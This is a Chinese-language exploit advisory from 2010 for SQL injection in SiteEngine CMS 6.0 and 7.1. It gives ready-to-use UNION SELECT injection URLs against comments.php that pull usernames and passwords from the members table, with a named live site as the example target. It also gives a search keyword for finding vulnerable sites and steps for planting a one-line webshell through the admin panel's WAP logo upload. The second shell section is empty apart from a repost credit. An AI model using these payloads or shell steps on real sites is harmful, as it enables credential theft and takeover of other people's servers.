#############################################################################
#标题: SiteEngine 6.0 SQL注入漏洞
#日期: 2010-11-25
#作者: Beach
#Team: www.linux520.com
#厂商: www.siteengine.net www.boka.cn
#关键字: “Powered by SiteEngine” //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启(默认开启)
#############################################################################
[*]利用:
http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,group_concat(username,0x3a,password,0x3c62723e),4,5, … ,24,25,26+from+boka_members%23
#############################################################################
[*]上Shell:
管理后台: http://server/admin/
系统维护—> wap设置—> 请上传wap logo图 (有大小限制,10k以内,传一句话即可) —>
确定—>马上浏览—>看图片属性即为一句话地址
#############################################################################
#############################################################################
#标题: SiteEngine 7.1 SQL注入漏洞
#日期: 2010-11-25
#作者: Beach
#Team: www.linux520.com
#厂商: www.siteengine.net www.boka.cn
#关键字: “Powered by SiteEngine” //300,000 +~
#############################################################################
[*]描述:
利用这个漏洞需要评论功能开启,默认开启
#############################################################################
[*]利用:
企业门户版本:
[1]http://www.nhs8.com/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,…,38,39+from+boka_members%23
[2]http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,…,26,27+from+boka_members%23
可能字段数不一样, 自己尝试
==============================================================================
电子商务版本:
[+]http://www.nhs8.com/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,…,37,38+from+boka_members%23
#############################################################################
其他版本类似
#############################################################################
[*]上Shell:
转载于:https://blog.51cto.com/pnig0s1992/432814